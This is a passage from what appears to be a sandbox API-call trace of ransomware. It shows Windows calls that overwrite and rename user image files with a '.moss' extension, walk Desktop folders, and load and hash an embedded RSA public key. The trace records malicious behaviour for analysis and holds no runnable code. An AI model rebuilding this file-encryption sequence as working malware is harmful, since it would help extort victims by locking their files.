lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.125] GetCurrentThreadId () returned 0x324 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b504c8 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.125] GetCurrentThreadId () returned 0x324 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35f7c30 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0172.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e238 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e250 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e220 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e268 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddb8 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e238 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e238 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e238 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e268 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e250 | out: hHeap=0xcd0000) returned 1 [0172.127] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e220 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e208 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51508 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.128] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xd8a8, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xd8a8, lpOverlapped=0x0) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0172.128] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd8ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.128] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.128] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0172.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0172.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0172.129] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.129] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.129] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0172.129] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0172.129] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0172.129] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0172.129] CloseHandle (hObject=0x664) returned 1 [0172.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46128 [0172.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b44498 [0172.130] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46128 | out: hHeap=0xcd0000) returned 1 [0172.130] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\SGTy2knpU9qG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\sgty2knpu9qg.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1dBcNb8\\SGTy2knpU9qG.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1dbcnb8\\sgty2knpu9qg.png.moss")) returned 1 [0172.131] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.131] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.131] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.132] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.132] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1e5780, ftCreationTime.dwHighDateTime=0x1d5dcf9, ftLastAccessTime.dwLowDateTime=0x6f709cb0, ftLastAccessTime.dwHighDateTime=0x1d5ddc3, ftLastWriteTime.dwLowDateTime=0x6f709cb0, ftLastWriteTime.dwHighDateTime=0x1d5ddc3, nFileSizeHigh=0x0, nFileSizeLow=0xd8ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SGTy2knpU9qG.png", cAlternateFileName="SGTY2K~1.PNG")) returned 0 [0172.132] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.133] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.133] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0172.133] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.133] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.133] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\") returned="eL7ZGLErx\\" [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\") returned="xxuaxzQ\\" [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51508 [0172.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.134] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.134] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.134] PathFindFileNameW (pszPath="") returned="" [0172.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42482070, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0xe27af3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5ce, ftLastWriteTime.dwLowDateTime=0xe27af3f0, ftLastWriteTime.dwHighDateTime=0x1d5e5ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.134] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\A7tQuX7Bkim.png") returned=".png" [0172.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\A7tQuX7Bkim.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\a7tqux7bkim.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.134] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=22168) returned 1 [0172.134] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.137] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5672, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.137] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.138] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5698, lpOverlapped=0x0) returned 1 [0172.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.138] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.139] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.139] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.139] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.140] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.140] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.140] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.140] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.140] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 